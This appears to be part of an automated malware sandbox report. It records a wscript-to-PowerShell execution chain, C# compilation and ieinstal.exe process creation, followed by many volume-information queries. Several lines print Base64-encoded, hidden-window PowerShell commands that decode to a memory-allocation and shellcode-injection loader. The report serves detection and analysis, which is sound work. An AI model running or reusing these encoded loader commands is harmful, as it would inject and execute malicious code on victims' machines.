SQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rf0jcwxf.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0A3.tmp" "c:\Users\user\AppData\Local\Temp\CSC1F7F6E38280547C88EA9F93164256468.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wxgbxjsa.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ginqqgem.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES330D.tmp" "c:\Users\user\AppData\Local\Temp\CSCED2B87455DE24E4084C3BB361169C34B.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA37.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CEBFB2B5FB1400592E8D3F6A040AE46.TMP"
Source: ieinstal.exe, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: ieinstal.exe, 00000011.00000003.399012710463.0000000002E47000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404635796.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011752798.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000003.399011957621.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401404217250.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000011.00000002.401406941267.0000000002E46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
